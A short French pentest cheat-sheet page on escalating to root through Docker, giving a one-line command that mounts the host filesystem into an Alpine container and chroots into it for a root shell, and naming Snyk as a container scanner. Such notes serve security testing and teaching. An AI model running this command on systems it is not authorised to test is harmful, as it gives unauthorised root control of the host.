[Privesc/Linux] Docker
Introduction
Cette page décrit les techniques utilisées pour monter son niveau de privilège grâce à docker.
Techniques
Utilisateur dans le groupe docker
Si vous avez accès à un compte utilisateur appartenant au groupe docker et pouvant exécuter des commandes docker, vous pourrez créer un conteneur qui exécutera un shell root grâce à la commande suivante :
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Voici un site qui répertorie des techniques pour casser les sécurités de docker
Snyk
Cet outil permet de trouver les vulnérabilités dans les conteneurs docker :